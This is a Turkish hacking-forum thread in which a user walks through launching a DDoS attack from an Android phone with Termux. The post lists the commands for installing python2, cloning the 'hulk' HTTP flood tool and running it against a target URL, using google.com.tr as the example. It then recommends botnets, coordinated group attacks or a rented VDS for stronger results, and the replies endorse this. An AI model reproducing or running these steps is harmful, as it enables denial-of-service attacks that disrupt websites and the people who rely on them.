Termux DDoS

ivanwasilevic

Uzman üye
29 Eki 2018
1,014
11
Tahmin Et
Herkese merhaba arkadaşlar bugün sizlere Android cihazlarda Termux üzerinden DDoS saldırısını göstereceğim
İlk olartak verdiğim komutları yazıyoruz.
Kod:
apt update
Kod:
apt upgrade
Kod:
pkg install git
Kod:
pkg install python2
Kod:
git clone https://github.com/ujjawalsaini3/hulk
Tool'umuzu indirdik arkadaşlar.Hemen ardından;
Kod:
cd hulk
Kod:
ls
Tool'a yetki vermemiz lazım arkadaşlar
Kod:
chmod +x hulk.py
Hemen ardından
Kod:
python2 hulk.py "URL"
Örnek olarak göstereyim size
Kod:
python2 hulk.py https://www.google.com.tr/
Ben Hulk üzerinden gösterdim arkadaşlar diğer Tollların çalışma mantığı da aynen bu şekildedir.Emeğe saygı olarak bi teşekkürü çok görmeyin.İyi forumlar.
maxresdefault.jpg

BONUS !DDoS saldırılarılarında kesin sonuç almak için botnet ağı oluşturabilirsiniz , gruplar halinde saldırabilirsiniz veya vds alıp saldırabilirsiniz

Son düzenleme:

S9NTX

Özel Üye
19 Ağu 2017
6,386
1,401
Dostum eline sağlık ama ddos öyle tek kişi atılmaz ya çok kişi olacaksın yada vds alacaksın tek kişi ancak dos atabilirsin

ivanwasilevic

Uzman üye
29 Eki 2018
1,014
11
Tahmin Et

K4R4 BELA

Katılımcı Üye
19 Ocak 2019
292
1
Çok kişiyle etkili saldırı lar yapılabilir bi araç eline sağlık dostum iyi forumlar

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.